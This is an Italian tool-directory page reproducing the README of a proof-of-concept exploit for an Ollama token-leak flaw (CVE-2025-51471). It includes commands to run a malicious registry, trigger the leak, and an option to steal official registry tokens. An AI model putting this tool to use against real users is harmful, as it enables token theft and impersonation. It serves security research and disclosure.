Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-51471-POC — Questa PoC è solo a scopo educativo e di test di sicurezza autorizzato. NON utilizzarla su sistemi che non possiedi. | Kitploit
Strumenti/GitHubGitHub/ajtazer/cve-2025-51471-poc
Analisi delle VulnerabilitàExploitSicurezza WebAutenticazioneRed Teaming
GitHubajtazer/cve-2025-51471-poc

CVE-2025-51471-POC

Questa PoC è solo a scopo educativo e di test di sicurezza autorizzato. NON utilizzarla su sistemi che non possiedi.

Vedi Repository
228 mesi faNon ancora revisionato
Sito web

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-51471 - PoC di esposizione del token cross-dominio di Ollama

CVE-2025-51471 Ollama CVSS

Autore: ajtazer

🔥 Panoramica

Questo repository contiene un Proof of Concept (PoC) per CVE-2025-51471, una vulnerabilità di esposizione del token di autenticazione cross-dominio che colpisce tutte le versioni di Ollama (inclusa l'ultima).

📋 Descrizione della vulnerabilità

Quando Ollama scarica un modello da un server HTTPS che risponde con 401 Unauthorized, segue l'URL realm dell'intestazione WWW-Authenticate [...]

senza verificare se appartiene allo stesso dominio

Ciò consente a un attaccante di:

  1. Configurare un server "registry" malevolo
  2. Indurre un utente a scaricare un modello da quel server
  3. Restituire una risposta 401 con un'intestazione WWW-Authenticate che punta a un endpoint controllato dall'attaccante
  4. Ollama invia ciecamente il suo token di autenticazione firmato Ed25519 all'attaccante
  5. L'attaccante cattura il token

Impatto

  • Accedere a modelli privati su registry.ollama.ai
  • Caricare modelli malevoli sotto l'identità della vittima
  • Impersonare la vittima sul registro Ollama

🚀 Avvio rapido

Prerequisiti

  • Python 3.7+
  • Flask (pip install flask)
  • Ollama (qualsiasi versione)

Installazione

root@kitploit:~
git clone https://github.com/ajtazer/CVE-2025-51471-PoC.git
cd CVE-2025-51471-PoC
pip install flask

Esecuzione del PoC

  1. Avvia il server registry malevolo (modalità HTTP):
root@kitploit:~
python3 malicious_registry.py --no-ssl
  1. In un altro terminale, assicurati che Ollama sia in esecuzione:
root@kitploit:~
ollama serve
  1. Attiva la vulnerabilità:
root@kitploit:~
# Using curl API
curl http://localhost:11434/api/pull -d '{"model": "localhost:8080/malicious/model", "insecure": true}'

# OR using ollama CLI
ollama pull --insecure localhost:8080/malicious/model
  1. Osserva il terminale del server per i token catturati!

🎬 Demo (Video del PoC)

Ho dimostrato questo PoC in un breve video — guardalo qui:

YouTube — Demo del PoC

Nota (modalità HTTPS su macOS): Se si utilizza la modalità HTTPS, aggiungi il certificato generato al tuo portachiavi o usa la modalità HTTP con --no-ssl.

📖 Opzioni di utilizzo

root@kitploit:~
python3 malicious_registry.py [-h] [--port PORT] [--no-ssl] [--steal-official]

Options:
  --port, -p PORT       Port to listen on (default: 8080)
  --no-ssl              Use HTTP instead of HTTPS
  --steal-official, -s  Redirect to steal registry.ollama.ai tokens
  --no-verbose          Disable verbose output

🔧 Endpoint dell'API

EndpointDescrizione
/v2/*Endpoint falso del registry (attiva l'exploit)
/v2/tokenEndpoint di cattura del token
/tokensVisualizza tutti i token catturati (JSON)
/healthControllo dello stato del server

🛡️ Mitigazione

  1. Scarica solo modelli da fonti attendibili
  2. Presta attenzione quando scarichi modelli da registry di terze parti
  3. Vedi PR #10750 per la correzione ufficiale

📝 Crediti

  • Autore: ajtazer
  • Ricercatori originali:
    • Mohammed Benhelli (@FuzzingLabs)
    • Patrick Ventuzelo (@FuzzingLabs)
    • Huntr Report

⚠️ Dichiarazione di non responsabilità

Questo PoC è solo per scopi educativi e di test di sicurezza autorizzati. Non usarlo contro sistemi che non possiedi.


Realizzato con ❤️ usando Antigravity

Scarica lo strumento